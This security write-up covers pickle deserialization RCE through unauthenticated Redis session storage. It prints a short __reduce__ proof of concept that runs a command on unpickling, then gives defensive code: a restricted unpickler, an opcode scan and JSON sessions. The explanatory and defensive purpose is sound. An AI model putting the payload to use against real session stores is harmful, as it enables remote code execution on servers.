A scenario I happened to run across today: Redis was reachable without authentication, but the Redis process had been dropped to low privileges. Redis was being used to store user sessions, and the Python backend read sessions back by deserializing them.
First, a picture of what a Pickle serialization looks like (image not included here).
Then write the serialized object into the session store; when the session is accessed, Python deserializes it, which causes RCE.
Here is a test example.
s is the payload.
import pickle
import os

class exp(object):
    # pickle calls __reduce__ when serializing; the (callable, args) it
    # returns is invoked by pickle.loads when the object is deserialized
    def __reduce__(self):
        s = "calc.exe"
        return (os.system, (s,))

e = exp()
s = pickle.dumps(e)          # s is the payload written into the session store
with open("rce", "wb") as f:
    f.write(s)
with open("rce", "rb") as f:
    data = pickle.loads(f.read())   # unpickling runs os.system("calc.exe")
    print(data)                     # prints the return code of os.system
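The defensive side of the same scenario, as an added example that is not from the original post: a session loader that refuses to resolve any global reference while unpickling, so a __reduce__ payload like the one above is rejected before its callable is ever looked up, plus a static scan that flags such payloads in stored session blobs without executing them, and the JSON encoding that should be used for session data in the first place. The session contents, the Exploit class and the function names are constructed for this example.

```python
import io
import json
import pickle
import pickletools
import os

# Constructed benign session, as the application might store it in Redis.
SAFE_SESSION = {"user_id": 42, "role": "viewer"}
SAFE_BLOB = pickle.dumps(SAFE_SESSION)

# Constructed hostile blob built the same way as the post's payload, but with
# a harmless command. It is never passed to plain pickle.loads() in this file.
class Exploit:
    def __reduce__(self):
        return (os.system, ("echo pwned",))

MALICIOUS_BLOB = pickle.dumps(Exploit())


class DenyAllUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global (module.name) reference.

    Pickles made of builtin containers and scalars (dict, list, str, int, ...)
    never call find_class, so they load normally. A __reduce__ payload must
    name a callable such as os.system, which is a global reference, so it is
    rejected here before REDUCE can run anything.
    """
    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"refusing to resolve global {module}.{name} in session data")


def load_session_strict(blob: bytes):
    """Deserialize a session blob, allowing only plain data types."""
    return DenyAllUnpickler(io.BytesIO(blob)).load()


def is_rejected(blob: bytes) -> bool:
    """True if the strict loader refuses the blob."""
    try:
        load_session_strict(blob)
    except pickle.UnpicklingError:
        return True
    return False


# Opcodes that import a callable by name; any of them in a session blob means
# it is not plain data.
_GLOBAL_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST"}

def pickle_references_globals(blob: bytes) -> bool:
    """Static scan of the opcode stream, useful for auditing stored session
    keys without ever executing them."""
    return any(op.name in _GLOBAL_OPCODES
               for op, _arg, _pos in pickletools.genops(blob))


# The actual fix: session data is plain data, so store it as JSON. There is no
# code path from a JSON document to a callable.
def dump_session_json(session: dict) -> bytes:
    return json.dumps(session).encode("utf-8")

def load_session_json(blob: bytes) -> dict:
    return json.loads(blob.decode("utf-8"))


if __name__ == "__main__":
    print("safe blob loads strictly:", load_session_strict(SAFE_BLOB))
    print("hostile blob rejected:", is_rejected(MALICIOUS_BLOB))
    print("hostile blob flagged by scan:", pickle_references_globals(MALICIOUS_BLOB))
    print("json round trip:", load_session_json(dump_session_json(SAFE_SESSION)))
```

The restricted unpickler is defense in depth, not the fix: an attacker who can write session keys still controls whatever fields the application trusts, so the Redis instance also needs authentication and network isolation, and stored sessions should be integrity-protected (for example with an HMAC keyed by a server secret) so that a write to Redis cannot forge a session at all.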